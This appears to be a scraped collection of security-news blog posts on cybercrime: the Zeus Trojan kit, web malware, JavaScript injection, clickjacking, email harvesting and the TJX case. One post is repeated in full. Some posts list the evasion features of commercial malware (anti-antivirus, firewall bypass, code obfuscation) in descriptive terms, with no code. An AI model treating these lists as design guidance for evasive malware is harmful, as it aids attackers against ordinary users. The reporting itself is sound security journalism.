Credit card fraud might have played role in financing Mumbai terror attacks, expert suggests

Indian authorities have recovered $1,200 and several credit cards from a backpack carried by one of the terrorists who assailed ten targets in Mumbai, killing at least 172 people and injuring hundreds of others, according to press
reports. The presence of the cards might signal that credit card fraud helped fund the terror attacks, Dennis Lormel, an anti-money laundering consultant who once led the Federal Bureau of Investigation’s anti-terrorist financing unit, told Complinet.
The credit cards in question reportedly were issued by Citibank, HSBC, ICICI Bank, Axis Bank, HDFC Bank and
State Bank of Mauritius. “I’m interested in the potential credit card fraud as a funding source and operational support mechanism,” Lormel said. For Lormel, the possible link between credit card fraud and the Mumbai terrorist attacks is more than a fleeting interest. He has long feared that terrorists are becoming increasingly adept at generating funds through such illicit schemes; he recently wrote a white paper in which he dubbed credit card fraud a “growth industry” for terrorists. “There is no empirical statistical data establishing the nexus between credit card exploitation and terrorism, but there are ample anecdotal case studies demonstrating how extensively terrorists rely on credit card information in furtherance of their heinous activities,” Lormel wrote in his paper.

Alternative funding sources

Lormel added that a previous Complinet article examining how the Mumbai attacks might have been funded
“presents interesting and viable possible funding sources.”
“It’s highly likely hawalas were used. Wealthy individual donors and charities could be funding sources, as pointed out. It will be interesting to determine if drugs and other criminal activities contributed. Likewise, the nexus between Dawood Ibrahim and the attack should be one of the highest investigative priorities,” he said.
“The attack itself will play out to be inexpensive. The overall operation will be much costlier when you factor in the
training and subsistence of the attackers and their logistical support element.”
Still, Lormel conceded that it may be some time before authorities can say with any degree of certainty how the
murderous rampage was funded. “It’s too early to understand the scope of the funding for the attacks,” he said.

Nobel Laureate is the father of Kevin Mitnick investigator | Zero Day | ZDNet.com

Nobel Laureate is the father of Kevin Mitnick investigator | Zero Day | ZDNet.com

Crimeware get easy and progressively harder to fight

The Zeus Trojan kit is not anything that new. It has been available on the market for around $700, and has been used more than 150 times in attacks around 4,000 computers per day as reported by stopBADware, the online malware resource.
Some additional background:

1. The Zeus Trojan is a kit for sale: Anyone in the criminal community can purchase it for roughly $700. In the past 6 months RSA’s Anti-Fraud Command Center has detected more than 150 different uses of the Zeus kit, each one infecting on average roughly 4,000 different computers a day.

2. Resistance to detection: The kit purchased is a binary generator. Each use creates a new binary file, and these files are radically different from each other — making them notoriously difficult for anti-virus or security software to detect. To date very few variants have had effective anti-virus signatures against them and each use of the kit usually makes existing signatures ineffective. Just like in most cases, this particular use of the Zeus kit did not have any anti-virus detection (with the popular engines we tested) at the time of this writing.

3. Rich feature set: the Zeus Trojan has many startling capabilities. In addition to listening in on the submission of forms in the browser, the Trojan also has advanced capabilities, for instance the ability to take screenshots of a victim’s machine, or control it remotely, or add additional pages to a website and monitor it, or steal passwords that have been stored by popular programs (remember when you clicked on the “Remember this password?” checkbox?)… And the features-list goes on.

In an additional twist, the Russian Business Network, which has been associated with creation and distribution of the Zeus kit, is actively working to protect their intellectual property from security companies and their customers. RBN has threatened to sue security companies for blacklisting their products.
In a trend to see this going even more mainstream we have seen a common Web 2.0 mentality is that the more people use the service, the better it gets, a mode of thinking we could see applied in the case of open source malware, and malware as a web service. Once the source code becomes publicly obtainable, it’s not just new features and modules that get introduced, but also, the malware starts using the Web as a platform.

Some of the most popular open source badware code kits are successfully building communities around this open source nature, attracting criminal innovation behalf of third-party coders.

And so we are begging to see a demand for “quality of service” which has lead to commercial code obfuscation software such as Code Virtualizer. “Code Virtualizer will convert your original code (Intel x86 instructions) into Virtual Opcodes that will only be understood by an internal Virtual Machine. Those Virtual Opcodes and the Virtual Machine itself are unique for every protected application, avoiding a general attack over Code Virtualizer. Code Virtualizer can protect your sensitive code areas in any x32 and x64 native PE files (like executable files/EXEs, system services, DLLs , OCXs , ActiveX controls, screen savers and device drivers).

Code Virtualizer can generate multiple types of virtual machines with a different instruction set for each one. This means that a specific block of Intel x86 instructions can be converted into different instruction set for each machine, preventing an attacker from recognizing any generated virtual opcode after the transformation from x86 instructions. The following picture represents how a block of Intel x86 instructions is converted into different kinds of virtual opcodes, which could be emulated by different virtual machines.

When an attacker tries to decompile a block of code that was protected by Code Virtualizer, he will not find the original x86 instructions. Instead, he will find a completely new instruction set which is not recognized by him or any other special decompiler. This will force the attacker to go through the extremely hard work of identifying how each opcode is executed and how the specific virtual machine works for each protected application. Code Virtualizer totally obfuscates the execution of the virtual opcodes and the study of each unique virtual machine in order to prevent someone from studying how the virtual opcodes are executed.”

Technorati Tags: cybercrime, fraud, Malware

Crimeware get easy and progressively harder to fight

The Zeus Trojan kit is not anything that new. It has been available on the market for around $700, and has been used more than 150 times in attacks around 4,000 computers per day as reported by stopBADware, the online malware resource.
Some additional background:

1. The Zeus Trojan is a kit for sale: Anyone in the criminal community can purchase it for roughly $700. In the past 6 months RSA’s Anti-Fraud Command Center has detected more than 150 different uses of the Zeus kit, each one infecting on average roughly 4,000 different computers a day.

2. Resistance to detection: The kit purchased is a binary generator. Each use creates a new binary file, and these files are radically different from each other — making them notoriously difficult for anti-virus or security software to detect. To date very few variants have had effective anti-virus signatures against them and each use of the kit usually makes existing signatures ineffective. Just like in most cases, this particular use of the Zeus kit did not have any anti-virus detection (with the popular engines we tested) at the time of this writing.

3. Rich feature set: the Zeus Trojan has many startling capabilities. In addition to listening in on the submission of forms in the browser, the Trojan also has advanced capabilities, for instance the ability to take screenshots of a victim’s machine, or control it remotely, or add additional pages to a website and monitor it, or steal passwords that have been stored by popular programs (remember when you clicked on the “Remember this password?” checkbox?)… And the features-list goes on.

In an additional twist, the Russian Business Network, which has been associated with creation and distribution of the Zeus kit, is actively working to protect their intellectual property from security companies and their customers. RBN has threatened to sue security companies for blacklisting their products.
In a trend to see this going even more mainstream we have seen a common Web 2.0 mentality is that the more people use the service, the better it gets, a mode of thinking we could see applied in the case of open source malware, and malware as a web service. Once the source code becomes publicly obtainable, it’s not just new features and modules that get introduced, but also, the malware starts using the Web as a platform.

Some of the most popular open source badware code kits are successfully building communities around this open source nature, attracting criminal innovation behalf of third-party coders.

And so we are begging to see a demand for “quality of service” which has lead to commercial code obfuscation software such as Code Virtualizer. “Code Virtualizer will convert your original code (Intel x86 instructions) into Virtual Opcodes that will only be understood by an internal Virtual Machine. Those Virtual Opcodes and the Virtual Machine itself are unique for every protected application, avoiding a general attack over Code Virtualizer. Code Virtualizer can protect your sensitive code areas in any x32 and x64 native PE files (like executable files/EXEs, system services, DLLs , OCXs , ActiveX controls, screen savers and device drivers).

Code Virtualizer can generate multiple types of virtual machines with a different instruction set for each one. This means that a specific block of Intel x86 instructions can be converted into different instruction set for each machine, preventing an attacker from recognizing any generated virtual opcode after the transformation from x86 instructions. The following picture represents how a block of Intel x86 instructions is converted into different kinds of virtual opcodes, which could be emulated by different virtual machines.

When an attacker tries to decompile a block of code that was protected by Code Virtualizer, he will not find the original x86 instructions. Instead, he will find a completely new instruction set which is not recognized by him or any other special decompiler. This will force the attacker to go through the extremely hard work of identifying how each opcode is executed and how the specific virtual machine works for each protected application. Code Virtualizer totally obfuscates the execution of the virtual opcodes and the study of each unique virtual machine in order to prevent someone from studying how the virtual opcodes are executed.”

Web Based Malware Gets Smart(er) and Nasty

The ongoing development of web based malware, we see the escalation of features along with the commoditization of anti-debugging features within modern malware. “Plain” simple feature sets started off to include what these malware creators are describing as managed binary crypting and firewall bypassing verification on demand in February of this year, to has matured to August’s overall anti antivirus software mentality as a key differentiation factor of malware.

So what new features are they working on? Anti tracing and emulation protection, PeID and PESniffer protection, as well as anti heuristic scanning .

Here’s a translated description (courtesy of the fine minds at Kasperksy) :

“- The binary works under admin and under normal user
– The binary is always run as the “current user”
– An unlimited number of bots can be loaded and integrated within the command and control, and with the geolocation feature, filters can be applied for a particular country
-After successful infection, the binary which is tested against popular firewall and proactive protection security ensures that the actions it takes and their order do not trigger protactive protection mechanisms in place
– binary file size is 25k, the size can be reduced once it’s crypted

– Doesn’t take advantage of BITS protocol
– Doesn’t allow an infected host to be infected twice
– Bypassing NAT and supporting “always-on” connections
– A simple, easy to configure web based admin panel”

JavaScript Injection Attack JavaScript Injection Attack JavaScript Injection Attack

JavaScript injection attacks seem to be the in thing these days. Malware writers are increasingly utilizing such attacks as a better means to spread their work.

As little as a year ago, the bad guys were dependent on enticing people to follow links that pointed to malicious websites (via e-mail, search links, or IM worms). Today, they are using JavaScript injection attacks to simply “steal” a website’s visitors, and it has become something of a Swiss Army Knife for underground hackers to spread their malware worldwide.

JS Injection

We’ve seen numerous high traffic, legitimate websites attacked using this technique. One recent example is MegaGames, a very popular U.S. gaming portal with a 3172 rank in Alexa. The JavaScript injection attack successfully exploited one of MegaGames’ servers to insert a couple extra lines of code. This addition redirects unsuspecting website visitors to a malicious European site where the main infection attempts are carried out.

The malicious site attempts two different methods to attack its visitors. The first is an attempt to exploit a Microsoft MDAC RDS.Dataspace ActiveX Control Remote Code Execution Vulnerability (MS06-014).

JS Attack

This attack would only affect website visitors using versions of Microsoft’s Internet Explorer (IE) browser, as the website basically requires visitors to use an ActiveX Control, then uses a loophole in the way the ActiveX Control interacts with the IE browser to provide remote attackers complete control over a victim’s system.

The second attack attempted is a drive-by download, which affects not only the IE browsers, but also Firefox 1.0 & 2.0 browsers. This attack uses JavaScript to detect the browser’s type, then uses Adobe Flash exploits to download and execute a malicious binary file onto the system.

Flash Exploits

The MegaGames website is currently still compromised and its misfortune illustrates a good point. Many Internet users are under the impression that they can only get infected with malware if they visit “obviously risky” (dodgy) websites, such as “pr0n” or “warez” sites. Unfortunately, that’s not true. Malware writers have been getting more sophisticated and today, even legitimate news or business sites can get surreptitiously compromised.

Another good example that no site is safe — BusinessWeek.com — a very legitimate and high traffic site. It has fallen victim to an SQL Injection attack, and such attacks inject JavaScript…

UAE gets new special anti-cybercrime body

Note: I will be visiting Dubai to follow up on a number of CyberCrime activity.

Cybersecurity in the United Arab Emirates has just got tighter following the announcement of the creation of the UAE Computer Emergency Response Team. The UAE’s Telecom Regulatory Authority has tasked this new group, which will start operations this year, with fighting cybercrime in the country.

The official unveiling of aeCERT has been made at the inaugural Deep Knowledge Security Conference, attended by regional and international cybersecurity experts. Mohammed Nasser Al Ghanim, director of the UAE’s Telecom Regulatory Authority, spoke of the need to create such a unit given the growing problems surrounding cybercrime in the region. “This year, the UAE counteracted many attacks, mainly website defacement, phishing attacks and many others. These attacks caused immense damage to the businesses,” said Al Ghanim.

A quick start to operations has been promised, as aeCERT should come online by the end of 2007. “The team will begin operation by the fourth quarter of this year. It will be comprehensive and help prevent much Internet crime,” said Fatma Bazarghan, who will head the new hi-tech unit. The UAE lately has been the focus of attention regarding cybercrime in the Gulf, as a large cyberfraud gang offering bogus services from the Dubai International Finance Centre was dismantled. Even more recently the authorities thwarted a hacking attempt on the Dubai eGovernment computer network, and the UAE are regional leaders in terms of sheer numbers of cyberattacks. However, much has also been done to safeguard online safety in the country with the adoption of strict anti-cybercrime laws in 2006. The establishment of the new crime-fighting group is another step in the right direction for the UAE.

Technorati Tags: cybercrime, fraud

New Clipjacking affects all browsers

Jeremiah Grossman and Robert “Rsnake” Hansen initially planned to reveal details on a new browser-agnostic clickjacking exploit at the Open Web Application Security Project (OWASP) in New York City this week, but voluntarily pulled the presentation after discovering that the 0-day flaw affected an Adobe product. The term “clickjacking” refers to a process by which a user is forced to click on a link without his or her knowledge—the link itself may be nearly invisible or visible for only a fraction of a second.

Clickjacking isn’t a new attack vector, but according to Grossman and Hansen, it’s one that is “severely underappreciated and largely undefended.” What makes the attack noteworthy, in this case, is that it appears to be completely browser-agnostic, and affects both Firefox 2 and 3, all versions of IE (including 8), and presumably all versions of Opera, Konquerer, Safari, and whatever other extremely marginalized and/or FailCat type of browser one might use to surf the web. The only browsers currently immune to whatever it is the two men discovered are text-based products, such as Lynx.

In this case, “whatever it is,” actually is the only appropriate label for this new attack method; Grossman and Hansen have released virtually no information on how one would actually exploit the vulnerability. Grossman and his teammate appear to have held off publishing after Adobe requested they do so, rather than as a favor to the browser market. In his blog, Grossman writes: “At the time, we believed our discoveries were more in line with generic Web browsers behavior, not traditional “exploits,” and that guarding against clickjacking was largely the browser vendors’ responsibility.”

Grossman and Hansen have, however, released a bit of information on what won’t protect a user from the exploit. Turning Javascript off is apparently useless—the attack doesn’t use it. Instead, it takes advantage of what the two call a “fundamental flaw” inherent to all modern browsers, and an issue that cannot be fixed with a quick patch. Using a frame buster script will protect a person from assaults that utilize cross-domain scripting, but will not prevent the attack from operating normally if it’s on a page the user is visiting.

As exploits go, this particular one seems a tempest in a teapot. The vulnerability in question may affect all web browsers, but the total dearth of publicly available data means anyone wanting to utilize it has their work cut out for them. Grossman states that this particular attack is capable of some “pretty spooky,” things, but that’s all the detail we get. I’m not a fan of security through obscurity, but that’s not what anyone is advocating—Adobe has acknowledged the problem, and the dev teams on both Firefox and IE are undoubtedly aware of the flaw’s existence. Hopefully they also received a bit more information than the public did.

250k of Harvested Hotmail Emails Go For?

$50 in this particular case, however, keeping in mind that the email harvester is anything but ethical, this very same database will be sold and re-sold more times than the original buyer would like to know about. Moreover, what someone is offering for sale, may in fact be already available as a value-added addition to a managed spamming service.

With metrics and quality assurance applied in a growing number of spam and phishing campaigns, filling in the niche of email harvesting by distinguishing between different types of obfuscated emails by releasing an easily embeddable module, was an anticipated move. What’s to come? Spam and malware campaigns across social networks “as usual” will propagate faster thanks to the ongoing harvesting of usernames within social networks, that would later on get imported in Web 2.0 “marketing” tools targeting the high-trafficked sites and automatically spamming them.

From a spammer’s perspective, geolocating these 250k emails could increase their selling prices since the buyers would be able to launch localized attacks with messages in the native languages of the receipts. Is the demand for quality email databases fueling the developments of this market segment, or are the spammers self-serving themselves and cashing-in by reselling what they’ve already abused a log time ago? That seems to be the case, since there’s no way a buyer could verify the freshness of the harvested emails database and whether or not it has already been abused.

For the time being, we’ve got several developed and many other developing market segments within spamming and phishing as different markets with different players. On one hand are the legitimately looking spamming providers offering “direct marketing services” working with lone spammers who find a reliable business partner in the face of the spamming vendor whose customers drive both side’s business models. On the other hand, you’ve got the spammers excelling in outsourcing the automatic account registration process, coming up with ways to build a spamming infrastructure — already available as a module to integrate in managed spamming services — using legitimate services as a provider of the infrastructure.

Despite that the arms race seems to be going on at several different fronts, spammers VS the industry and spammers VS spammers fighting for market share, the entire underground ecosystem is clearly allocating a lot of resources for research and development in order to ensure that they are always a step ahead of the industry.

Second TJX Case Defendant Pleads Guilty

A second defendant in the so-called TJX Breach case—which also had at least seven other major retail chains as fellow victims—pleaded guilty Monday (Sept. 22), this time to charges of conspiracy, unauthorized access to computer systems, access device fraud and identity theft.

The accused, Christopher Scott, a 25-year-old Miami resident, pleaded guilty after prosecutors said they could prove that he was paid $400,000 for assisting a retail wardriving scheme. Scott’s plea follows the Sept. 11 guilty plea of fellow Miami resident Damon Patrick Toey.